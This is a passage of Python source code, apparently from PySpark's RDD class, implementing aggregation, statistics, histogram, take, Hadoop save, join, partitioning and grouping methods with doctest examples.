depth))), 2) # If creating an extra level doesn't help reduce the wall-clock time, we stop the tree # aggregation. while numPartitions > scale + numPartitions / scale: numPartitions /= scale curNumPartitions = int(numPartitions) def mapPartition(i, iterator): for obj in iterator: yield (i % curNumPartitions, obj) partiallyAggregated = partiallyAggregated \ .mapPartitionsWithIndex(mapPartition) \ .reduceByKey(combOp, curNumPartitions) \ .values() return partiallyAggregated.reduce(combOp) def max(self, key=None): """ Find the maximum item in this RDD. :param key: A function used to generate key for comparing >>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0]) >>> rdd.max() 43.0 >>> rdd.max(key=str) 5.0 """ if key is None: return self.reduce(max) return self.reduce(lambda a, b: max(a, b, key=key)) def min(self, key=None): """ Find the minimum item in this RDD. :param key: A function used to generate key for comparing >>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0]) >>> rdd.min() 2.0 >>> rdd.min(key=str) 10.0 """ if key is None: return self.reduce(min) return self.reduce(lambda a, b: min(a, b, key=key)) def sum(self): """ Add up the elements in this RDD. >>> sc.parallelize([1.0, 2.0, 3.0]).sum() 6.0 """ return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add) def count(self): """ Return the number of elements in this RDD. >>> sc.parallelize([2, 3, 4]).count() 3 """ return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum() def stats(self): """ Return a L{StatCounter} object that captures the mean, variance and count of the RDD's elements in one operation. """ def redFunc(left_counter, right_counter): return left_counter.mergeStats(right_counter) return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc) def histogram(self, buckets): """ Compute a histogram using the provided buckets. The buckets are all open to the right except for the last which is closed. e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50], which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1 and 50 we would have a histogram of 1,0,1. If your histogram is evenly spaced (e.g. [0, 10, 20, 30]), this can be switched from an O(log n) inseration to O(1) per element (where n is the number of buckets). Buckets must be sorted, not contain any duplicates, and have at least two elements. If `buckets` is a number, it will generate buckets which are evenly spaced between the minimum and maximum of the RDD. For example, if the min value is 0 and the max is 100, given `buckets` as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must be at least 1. An exception is raised if the RDD contains infinity. If the elements in the RDD do not vary (max == min), a single bucket will be used. The return value is a tuple of buckets and histogram. >>> rdd = sc.parallelize(range(51)) >>> rdd.histogram(2) ([0, 25, 50], [25, 26]) >>> rdd.histogram([0, 5, 25, 50]) ([0, 5, 25, 50], [5, 20, 26]) >>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets ([0, 15, 30, 45, 60], [15, 15, 15, 6]) >>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"]) >>> rdd.histogram(("a", "b", "c")) (('a', 'b', 'c'), [2, 2]) """ if isinstance(buckets, int): if buckets < 1: raise ValueError("number of buckets must be >= 1") # filter out non-comparable elements def comparable(x): if x is None: return False if type(x) is float and isnan(x): return False return True filtered = self.filter(comparable) # faster than stats() def minmax(a, b): return min(a[0], b[0]), max(a[1], b[1]) try: minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax) except TypeError as e: if " empty " in str(e): raise ValueError("can not generate buckets from empty RDD") raise if minv == maxv or buckets == 1: return [minv, maxv], [filtered.count()] try: inc = (maxv - minv) / buckets except TypeError: raise TypeError("Can not generate buckets with non-number in RDD") if isinf(inc): raise ValueError("Can not generate buckets with infinite value") # keep them as integer if possible inc = int(inc) if inc * buckets != maxv - minv: inc = (maxv - minv) * 1.0 / buckets buckets = [i * inc + minv for i in range(buckets)] buckets.append(maxv) # fix accumulated error even = True elif isinstance(buckets, (list, tuple)): if len(buckets) < 2: raise ValueError("buckets should have more than one value") if any(i is None or isinstance(i, float) and isnan(i) for i in buckets): raise ValueError("can not have None or NaN in buckets") if sorted(buckets) != list(buckets): raise ValueError("buckets should be sorted") if len(set(buckets)) != len(buckets): raise ValueError("buckets should not contain duplicated values") minv = buckets[0] maxv = buckets[-1] even = False inc = None try: steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)] except TypeError: pass # objects in buckets do not support '-' else: if max(steps) - min(steps) < 1e-10: # handle precision errors even = True inc = (maxv - minv) / (len(buckets) - 1) else: raise TypeError("buckets should be a list or tuple or number(int or long)") def histogram(iterator): counters = [0] * len(buckets) for i in iterator: if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv: continue t = (int((i - minv) / inc) if even else bisect.bisect_right(buckets, i) - 1) counters[t] += 1 # add last two together last = counters.pop() counters[-1] += last return [counters] def mergeCounters(a, b): return [i + j for i, j in zip(a, b)] return buckets, self.mapPartitions(histogram).reduce(mergeCounters) def mean(self): """ Compute the mean of this RDD's elements. >>> sc.parallelize([1, 2, 3]).mean() 2.0 """ return self.stats().mean() def variance(self): """ Compute the variance of this RDD's elements. >>> sc.parallelize([1, 2, 3]).variance() 0.666... """ return self.stats().variance() def stdev(self): """ Compute the standard deviation of this RDD's elements. >>> sc.parallelize([1, 2, 3]).stdev() 0.816... """ return self.stats().stdev() def sampleStdev(self): """ Compute the sample standard deviation of this RDD's elements (which corrects for bias in estimating the standard deviation by dividing by N-1 instead of N). >>> sc.parallelize([1, 2, 3]).sampleStdev() 1.0 """ return self.stats().sampleStdev() def sampleVariance(self): """ Compute the sample variance of this RDD's elements (which corrects for bias in estimating the variance by dividing by N-1 instead of N). >>> sc.parallelize([1, 2, 3]).sampleVariance() 1.0 """ return self.stats().sampleVariance() def countByValue(self): """ Return the count of each unique value in this RDD as a dictionary of (value, count) pairs. >>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items()) [(1, 2), (2, 3)] """ def countPartition(iterator): counts = defaultdict(int) for obj in iterator: counts[obj] += 1 yield counts def mergeMaps(m1, m2): for k, v in m2.items(): m1[k] += v return m1 return self.mapPartitions(countPartition).reduce(mergeMaps) def top(self, num, key=None): """ Get the top N elements from an RDD. .. note:: This method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. .. note:: It returns the list sorted in descending order. >>> sc.parallelize([10, 4, 2, 12, 3]).top(1) [12] >>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2) [6, 5] >>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str) [4, 3, 2] """ def topIterator(iterator): yield heapq.nlargest(num, iterator, key=key) def merge(a, b): return heapq.nlargest(num, a + b, key=key) return self.mapPartitions(topIterator).reduce(merge) def takeOrdered(self, num, key=None): """ Get the N elements from an RDD ordered in ascending order or as specified by the optional key function. .. note:: this method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6) [1, 2, 3, 4, 5, 6] >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x) [10, 9, 7, 6, 5, 4] """ def merge(a, b): return heapq.nsmallest(num, a + b, key) return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge) def take(self, num): """ Take the first num elements of the RDD. It works by first scanning one partition, and use the results from that partition to estimate the number of additional partitions needed to satisfy the limit. Translated from the Scala implementation in RDD#take(). .. note:: this method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. >>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2) [2, 3] >>> sc.parallelize([2, 3, 4, 5, 6]).take(10) [2, 3, 4, 5, 6] >>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3) [91, 92, 93] """ items = [] totalParts = self.getNumPartitions() partsScanned = 0 while len(items) < num and partsScanned < totalParts: # The number of partitions to try in this iteration. # It is ok for this number to be greater than totalParts because # we actually cap it at totalParts in runJob. numPartsToTry = 1 if partsScanned > 0: # If we didn't find any rows after the previous iteration, # quadruple and retry. Otherwise, interpolate the number of # partitions we need to try, but overestimate it by 50%. # We also cap the estimation in the end. if len(items) == 0: numPartsToTry = partsScanned * 4 else: # the first paramter of max is >=1 whenever partsScanned >= 2 numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4) left = num - len(items) def takeUpToNumLeft(iterator): iterator = iter(iterator) taken = 0 while taken < left: yield next(iterator) taken += 1 p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts)) res = self.context.runJob(self, takeUpToNumLeft, p) items += res partsScanned += numPartsToTry return items[:num] def first(self): """ Return the first element in this RDD. >>> sc.parallelize([2, 3, 4]).first() 2 >>> sc.parallelize([]).first() Traceback (most recent call last): ... ValueError: RDD is empty """ rs = self.take(1) if rs: return rs[0] raise ValueError("RDD is empty") def isEmpty(self): """ Returns true if and only if the RDD contains no elements at all. .. note:: an RDD may be empty even when it has at least 1 partition. >>> sc.parallelize([]).isEmpty() True >>> sc.parallelize([1]).isEmpty() False """ return self.getNumPartitions() == 0 or len(self.take(1)) == 0 def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are converted for output using either user specified converters or, by default, L{org.apache.spark.api.python.JavaToWritableConverter}. :param conf: Hadoop job configuration, passed in as a dict :param keyConverter: (None by default) :param valueConverter: (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, True) def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None, keyConverter=None, valueConverter=None, conf=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types will be inferred if not specified. Keys and values are converted for output using either user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The C{conf} is applied on top of the base Hadoop conf associated with the SparkContext of this RDD to create a merged Hadoop MapReduce job configuration for saving the data. :param path: path to Hadoop file :param outputFormatClass: fully qualified classname of Hadoop OutputFormat (e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat") :param keyClass: fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.IntWritable", None by default) :param valueClass: fully qualified classname of value Writable class (e.g. "org.apache.hadoop.io.Text", None by default) :param keyConverter: (None by default) :param valueConverter: (None by default) :param conf: Hadoop job configuration, passed in as a dict (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path, outputFormatClass, keyClass, valueClass, keyConverter, valueConverter, jconf) def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the old Hadoop OutputFormat API (mapred package). Keys/values are converted for output using either user specified converters or, by default, L{org.apache.spark.api.python.JavaToWritableConverter}. :param conf: Hadoop job configuration, passed in as a dict :param keyConverter: (None by default) :param valueConverter: (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, False) def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None, keyConverter=None, valueConverter=None, conf=None, compressionCodecClass=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the old Hadoop OutputFormat API (mapred package). Key and value types will be inferred if not specified. Keys and values are converted for output using either user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The C{conf} is applied on top of the base Hadoop conf associated with the SparkContext of this RDD to create a merged Hadoop MapReduce job configuration for saving the data. :param path: path to Hadoop file :param outputFormatClass: fully qualified classname of Hadoop OutputFormat (e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat") :param keyClass: fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.IntWritable", None by default) :param valueClass: fully qualified classname of value Writable class (e.g. "org.apache.hadoop.io.Text", None by default) :param keyConverter: (None by default) :param valueConverter: (None by default) :param conf: (None by default) :param compressionCodecClass: (None by default) """ jconf = self.ctx._dictToJavaMap(conf) pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path, outputFormatClass, keyClass, valueClass, keyConverter, valueConverter, jconf, compressionCodecClass) def saveAsSequenceFile(self, path, compressionCodecClass=None): """ Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file system, using the L{org.apache.hadoop.io.Writable} types that we convert from the RDD's key and value types. The mechanism is as follows: 1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects. 2. Keys and values of this Java RDD are converted to Writables and written out. :param path: path to sequence file :param compressionCodecClass: (None by default) """ pickledRDD = self._pickled() self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True, path, compressionCodecClass) def saveAsPickleFile(self, path, batchSize=10): """ Save this RDD as a SequenceFile of serialized objects. The serializer used is L{pyspark.serializers.PickleSerializer}, default batch size is 10. >>> tmpFile = NamedTemporaryFile(delete=True) >>> tmpFile.close() >>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3) >>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect()) ['1', '2', 'rdd', 'spark'] """ if batchSize == 0: ser = AutoBatchedSerializer(PickleSerializer()) else: ser = BatchedSerializer(PickleSerializer(), batchSize) self._reserialize(ser)._jrdd.saveAsObjectFile(path) @ignore_unicode_prefix def saveAsTextFile(self, path, compressionCodecClass=None): """ Save this RDD as a text file, using string representations of elements. @param path: path to text file @param compressionCodecClass: (None by default) string i.e. "org.apache.hadoop.io.compress.GzipCodec" >>> tempFile = NamedTemporaryFile(delete=True) >>> tempFile.close() >>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name) >>> from fileinput import input >>> from glob import glob >>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*")))) '0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n' Empty lines are tolerated when saving to text files. >>> tempFile2 = NamedTemporaryFile(delete=True) >>> tempFile2.close() >>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name) >>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*")))) '\\n\\n\\nbar\\nfoo\\n' Using compressionCodecClass >>> tempFile3 = NamedTemporaryFile(delete=True) >>> tempFile3.close() >>> codec = "org.apache.hadoop.io.compress.GzipCodec" >>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec) >>> from fileinput import input, hook_compressed >>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed)) >>> b''.join(result).decode('utf-8') u'bar\\nfoo\\n' """ def func(split, iterator): for x in iterator: if not isinstance(x, (unicode, bytes)): x = unicode(x) if isinstance(x, unicode): x = x.encode("utf-8") yield x keyed = self.mapPartitionsWithIndex(func) keyed._bypass_serializer = True if compressionCodecClass: compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass) keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec) else: keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path) # Pair functions def collectAsMap(self): """ Return the key-value pairs in this RDD to the master as a dictionary. .. note:: this method should only be used if the resulting data is expected to be small, as all the data is loaded into the driver's memory. >>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap() >>> m[1] 2 >>> m[3] 4 """ return dict(self.collect()) def keys(self): """ Return an RDD with the keys of each tuple. >>> m = sc.parallelize([(1, 2), (3, 4)]).keys() >>> m.collect() [1, 3] """ return self.map(lambda x: x[0]) def values(self): """ Return an RDD with the values of each tuple. >>> m = sc.parallelize([(1, 2), (3, 4)]).values() >>> m.collect() [2, 4] """ return self.map(lambda x: x[1]) def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash): """ Merge the values for each key using an associative and commutative reduce function. This will also perform the merging locally on each mapper before sending results to a reducer, similarly to a "combiner" in MapReduce. Output will be partitioned with C{numPartitions} partitions, or the default parallelism level if C{numPartitions} is not specified. Default partitioner is hash-partition. >>> from operator import add >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.reduceByKey(add).collect()) [('a', 2), ('b', 1)] """ return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc) def reduceByKeyLocally(self, func): """ Merge the values for each key using an associative and commutative reduce function, but return the results immediately to the master as a dictionary. This will also perform the merging locally on each mapper before sending results to a reducer, similarly to a "combiner" in MapReduce. >>> from operator import add >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.reduceByKeyLocally(add).items()) [('a', 2), ('b', 1)] """ def reducePartition(iterator): m = {} for k, v in iterator: m[k] = func(m[k], v) if k in m else v yield m def mergeMaps(m1, m2): for k, v in m2.items(): m1[k] = func(m1[k], v) if k in m1 else v return m1 return self.mapPartitions(reducePartition).reduce(mergeMaps) def countByKey(self): """ Count the number of elements for each key, and return the result to the master as a dictionary. >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.countByKey().items()) [('a', 2), ('b', 1)] """ return self.map(lambda x: x[0]).countByValue() def join(self, other, numPartitions=None): """ Return an RDD containing all pairs of elements with matching keys in C{self} and C{other}. Each pair of elements will be returned as a (k, (v1, v2)) tuple, where (k, v1) is in C{self} and (k, v2) is in C{other}. Performs a hash join across the cluster. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2), ("a", 3)]) >>> sorted(x.join(y).collect()) [('a', (1, 2)), ('a', (1, 3))] """ return python_join(self, other, numPartitions) def leftOuterJoin(self, other, numPartitions=None): """ Perform a left outer join of C{self} and C{other}. For each element (k, v) in C{self}, the resulting RDD will either contain all pairs (k, (v, w)) for w in C{other}, or the pair (k, (v, None)) if no elements in C{other} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> sorted(x.leftOuterJoin(y).collect()) [('a', (1, 2)), ('b', (4, None))] """ return python_left_outer_join(self, other, numPartitions) def rightOuterJoin(self, other, numPartitions=None): """ Perform a right outer join of C{self} and C{other}. For each element (k, w) in C{other}, the resulting RDD will either contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w)) if no elements in C{self} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> sorted(y.rightOuterJoin(x).collect()) [('a', (2, 1)), ('b', (None, 4))] """ return python_right_outer_join(self, other, numPartitions) def fullOuterJoin(self, other, numPartitions=None): """ Perform a right outer join of C{self} and C{other}. For each element (k, v) in C{self}, the resulting RDD will either contain all pairs (k, (v, w)) for w in C{other}, or the pair (k, (v, None)) if no elements in C{other} have key k. Similarly, for each element (k, w) in C{other}, the resulting RDD will either contain all pairs (k, (v, w)) for v in C{self}, or the pair (k, (None, w)) if no elements in C{self} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2), ("c", 8)]) >>> sorted(x.fullOuterJoin(y).collect()) [('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))] """ return python_full_outer_join(self, other, numPartitions) # TODO: add option to control map-side combining # portable_hash is used as default, because builtin hash of None is different # cross machines. def partitionBy(self, numPartitions, partitionFunc=portable_hash): """ Return a copy of the RDD partitioned using the specified partitioner. >>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x)) >>> sets = pairs.partitionBy(2).glom().collect() >>> len(set(sets[0]).intersection(set(sets[1]))) 0 """ if numPartitions is None: numPartitions = self._defaultReducePartitions() partitioner = Partitioner(numPartitions, partitionFunc) if self.partitioner == partitioner: return self # Transferring O(n) objects to Java is too expensive. # Instead, we'll form the hash buckets in Python, # transferring O(numPartitions) objects to Java. # Each object is a (splitNumber, [objects]) pair. # In order to avoid too huge objects, the objects are # grouped into chunks. outputSerializer = self.ctx._unbatched_serializer limit = (_parse_memory(self.ctx._conf.get( "spark.python.worker.memory", "512m")) / 2) def add_shuffle_key(split, iterator): buckets = defaultdict(list) c, batch = 0, min(10 * numPartitions, 1000) for k, v in iterator: buckets[partitionFunc(k) % numPartitions].append((k, v)) c += 1 # check used memory and avg size of chunk of objects if (c % 1000 == 0 and get_used_memory() > limit or c > batch): n, size = len(buckets), 0 for split in list(buckets.keys()): yield pack_long(split) d = outputSerializer.dumps(buckets[split]) del buckets[split] yield d size += len(d) avg = int(size / n) >> 20 # let 1M < avg < 10M if avg < 1: batch *= 1.5 elif avg > 10: batch = max(int(batch / 1.5), 1) c = 0 for split, items in buckets.items(): yield pack_long(split) yield outputSerializer.dumps(items) keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True) keyed._bypass_serializer = True with SCCallSiteSync(self.context) as css: pairRDD = self.ctx._jvm.PairwiseRDD( keyed._jrdd.rdd()).asJavaPairRDD() jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions, id(partitionFunc)) jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner)) rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer)) rdd.partitioner = partitioner return rdd # TODO: add control over map-side aggregation def combineByKey(self, createCombiner, mergeValue, mergeCombiners, numPartitions=None, partitionFunc=portable_hash): """ Generic function to combine the elements for each key using a custom set of aggregation functions. Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined type" C. Users provide three functions: - C{createCombiner}, which turns a V into a C (e.g., creates a one-element list) - C{mergeValue}, to merge a V into a C (e.g., adds it to the end of a list) - C{mergeCombiners}, to combine two C's into a single one (e.g., merges the lists) To avoid memory allocation, both mergeValue and mergeCombiners are allowed to modify and return their first argument instead of creating a new C. In addition, users can control the partitioning of the output RDD. .. note:: V and C can be different -- for example, one might group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]). >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)]) >>> def to_list(a): ... return [a] ... >>> def append(a, b): ... a.append(b) ... return a ... >>> def extend(a, b): ... a.extend(b) ... return a ... >>> sorted(x.combineByKey(to_list, append, extend).collect()) [('a', [1, 2]), ('b', [1])] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() serializer = self.ctx.serializer memory = self._memory_limit() agg = Aggregator(createCombiner, mergeValue, mergeCombiners) def combineLocally(iterator): merger = ExternalMerger(agg, memory * 0.9, serializer) merger.mergeValues(iterator) return merger.items() locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True) shuffled = locally_combined.partitionBy(numPartitions, partitionFunc) def _mergeCombiners(iterator): merger = ExternalMerger(agg, memory, serializer) merger.mergeCombiners(iterator) return merger.items() return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True) def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None, partitionFunc=portable_hash): """ Aggregate the values of each key, using given combine functions and a neutral "zero value". This function can return a different result type, U, than the type of the values in this RDD, V. Thus, we need one operation for merging a V into a U and one operation for merging two U's, The former operation is used for merging values within a partition, and the latter is used for merging values between partitions. To avoid memory allocation, both of these functions are allowed to modify and return their first argument instead of creating a new U. """ def createZero(): return copy.deepcopy(zeroValue) return self.combineByKey( lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc) def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash): """ Merge the values for each key using an associative function "func" and a neutral "zeroValue" which may be added to the result an arbitrary number of times, and must not change the result (e.g., 0 for addition, or 1 for multiplication.). >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> from operator import add >>> sorted(rdd.foldByKey(0, add).collect()) [('a', 2), ('b', 1)] """ def createZero(): return copy.deepcopy(zeroValue) return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions, partitionFunc) def _memory_limit(self): return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m")) # TODO: support variant with custom partitioner def groupByKey(self, numPartitions=None, partitionFunc=portable_hash): """ Group the values for each key in the RDD into a single sequence. Hash-partitions the resulting RDD with numPartitions partitions. .. note:: If you are grouping in order to perform an aggregation (such as a sum or average) over each key, using reduceByKey or aggregateByKey will provide much better performance. >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.groupByKey().mapValues(len).collect()) [('a', 2), ('b', 1)] >>> sorted(rdd.groupByKey().mapValues(list).collect()) [('a', [1, 1]), ('b', [1])] """ def createCombiner(x): return [x] def mergeValue(xs, x): xs.append(x) return xs def mergeCombiners(a, b): a.extend(b) return a memory = self._memory_limit() serializer = self._jrdd_deserializer agg = Aggregator(createCombiner, mergeValue, mergeCombiners) def combine(iterator): merger = ExternalMerger(agg, memory * 0.9, serializer) merger.mergeValues(iterator) return merger.items() locally_combined = self.mapPartitions(combine, preservesPartitioning=True) shuffled = locally_combined.partitionBy(numPartitions, partitionFunc) def groupByKey(it): merger = ExternalGroupBy(agg, memory, serializer) merger.mergeCombiners(it) return merger.items() return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable) def flatMapValues(self, f): """ Pass each value in the key-value pair RDD through a flatMap function without changing the keys; this also retains the original RDD's partitioning. >>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])]) >>> def f(x): return x >>> x.flatMapValues(f).collect() [('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')] """ flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1])) return self.flatMap(flat_map_fn, preservesPartitioning=True) def mapValues(self, f): """ Pass each value in the key-value pair RDD through a map function without changing the keys; this also retains the original RDD's partitioning. >>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])]) >>> def f(x): return len(x) >>> x.mapValues(f).collect() [('a', 3), ('b', 1)] """ map_values_fn = lambda kv: (kv[0], f(kv[1])) return self.map(map_values_fn, preservesPartitioning=True) def groupWith(self, other, *others): """ Alias for cogroup but with support for multiple RDDs. >>> w = sc.parallelize([("a", 5), ("b", 6)]) >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> z = sc.parallelize([("b", 42)]) >>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))] [('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))] """ return python_cogroup((self, other) + others, numPartitions=None) # TODO: add variant with custom parittioner def cogroup(self, other, numPartitions=None): """ For each key k in C{self} or C{other}, return a resulting RDD that contains a tuple with the list of values for that key in C{self} as well as C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))] [('a', ([1], [2])), ('b', ([4], []))] """ return python_cogroup((self, other), numPartitions) def sampleByKey(self, withReplacement, fractions, seed=None): """ Return a subset of this RDD sampled by key (via stratified sampling). Create a sample of this RDD using variable sampling rates for different keys as specified by fractions, a key to sampling rate map. >>> fractions = {"a": 0.2, "b": 0.1} >>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000))) >>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect()) >>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150 True >>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0 True >>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0 True """ for fraction in fractions.values(): assert fraction >= 0.0, "Negative fraction value: %s" % fraction return self.mapPartitionsWithIndex( RDDStratifiedSampler(withReplacement, fractions, seed).func, True) def subtractByKey(self, other, numPartitions=None): """ Return each (key, value) pair in C{self} that has no pair with matching key in C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)]) >>> y = sc.parallelize([("a", 3), ("c", None)]) >>> sorted(x.subtractByKey(y).collect()) [('b', 4), ('b', 5)] """ def filter_func(pair): key, (val1, val2) = pair return val1 and not val2 return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0]) def subtract(self, other, numPartitions=None): """ Return each value in C{self} that is not contained in C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)]) >>> y = sc.parallelize([("a", 3), ("c", None)]) >>> sorted(x.subtract(y).collect()) [('a', 1), ('b', 4), ('b', 5)] """ # note: here 'True' is just a placeholder rdd = other.map(lambda x: (x, True)) return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys() def keyBy(self, f): """ Creates tuples of the elements in this RDD by applying C{f}. >>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x) >>> y = sc.parallelize(zip(range(0,5), range(0,5))) >>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())] [(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])] """ return self.map(lambda x: (f(x), x)) def repartition(self, numPartitions): """ Return a new RDD that has exactly numPartitions partitions. Can increase or decrease the level of parallelism in this RDD. Internally, this uses a shuffle to redistribute data. If you are decreasing the number of partitions in this RDD, consider using `coalesce`, which can avoid performing a shuffle. >>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4) >>> sorted(rdd.glom().collect()) [[1], [2, 3], [4, 5], [6, 7]] >>> len(rdd.repartition(2).glom().collect()) 2 >>> len(rdd.repartition(10).glom().collect()) 10 """ return 